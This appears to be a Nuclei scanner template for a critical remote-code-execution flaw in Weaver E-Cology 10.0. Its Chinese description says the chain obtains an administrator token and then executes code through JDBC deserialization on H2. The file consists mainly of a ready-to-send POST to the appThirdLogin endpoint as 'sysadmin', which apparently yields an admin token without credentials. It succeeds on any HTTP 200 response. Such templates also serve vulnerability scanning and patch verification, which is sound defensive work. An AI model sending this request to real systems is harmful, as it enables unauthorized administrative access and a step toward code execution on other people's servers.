id: weaver-ecologyv10-testConnByBasePassword-rce

info:
  name: 泛微E-Cology10 testConnByBasePassword rce
  author: yichen
  severity: critical
  description: 泛微Ecology-10.0存在远程代码执行漏洞，该漏洞通过Ecology-10.0获取管理员访问令牌，然后通过JDBC反序列化和实现RCE,系统必须依赖于 H2 数据库，该POC来自于网络，自行判断。

http:
- raw:
  - |-
    @timeout: 30s
    POST /papi/passport/rest/appThirdLogin HTTP/1.1
    Host: {{Hostname}}
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 48

    username=sysadmin&service=1&ip=1&loginType=third

  matchers:
    - type: dsl
      dsl:
        - status_code == 200
